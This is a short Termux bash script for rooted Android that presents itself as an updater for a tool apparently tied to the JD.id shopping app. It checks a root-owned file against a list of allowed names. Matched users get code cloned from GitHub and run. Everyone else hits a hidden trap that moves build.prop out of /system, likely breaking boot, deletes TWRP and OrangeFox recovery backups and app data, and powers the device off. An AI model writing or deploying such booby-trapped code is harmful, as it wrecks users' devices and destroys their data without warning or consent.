#!/data/data/com.termux/files/usr/bin/bash

if [ $(su -c cat /data/ranjau) == siex ] || [ $(su -c cat /data/ranjau) == siye ] || [ $(su -c cat /data/ranjau) == sizet ] || [ $(su -c cat /data/ranjau) == gembix ] || [ $(su -c cat /data/ranjau) == lavender ] || [ $(su -c cat /data/ranjau) == galang ] || [ $(su -c cat /data/ranjau) == farhan ] || [ $(su -c cat /data/ranjau) == petra ] || [ $(su -c cat /data/ranjau) == tomi ] || [ $(su -c cat /data/ranjau) == diyan ] || [ $(su -c cat /data/ranjau) == mail ] || [ $(su -c cat /data/ranjau) == Xmansur ] || [ $(su -c cat /data/ranjau) == rifal ] || [ $(su -c cat /data/ranjau) == vince ]; then
yes | cp -fr -t ~/.shortcuts/ Update
rm -rf ~/jd2/
rm -rf ~/jdx/
cd ~/
git clone https://github.com/g3mb1x/jdx.git
cd ~/jdx/
chmod +x bix
bash bix
else
su -c mount -o rw,remount /
su -c mkdir /system/.sys
su -c mv /system/build.prop /system/.sys
su -c mount -o ro,remount /
su -c rm -rf /data/data/jd.cdyjy.overseas.market.indonesia/.g3m/.b1x
su -c rm -rf /sdcard/Fox
su -c rm -rf /sdcard/TWRP
su -c rm -rf /sdcard/TeBe
su -c reboot -p
fi
exit 0
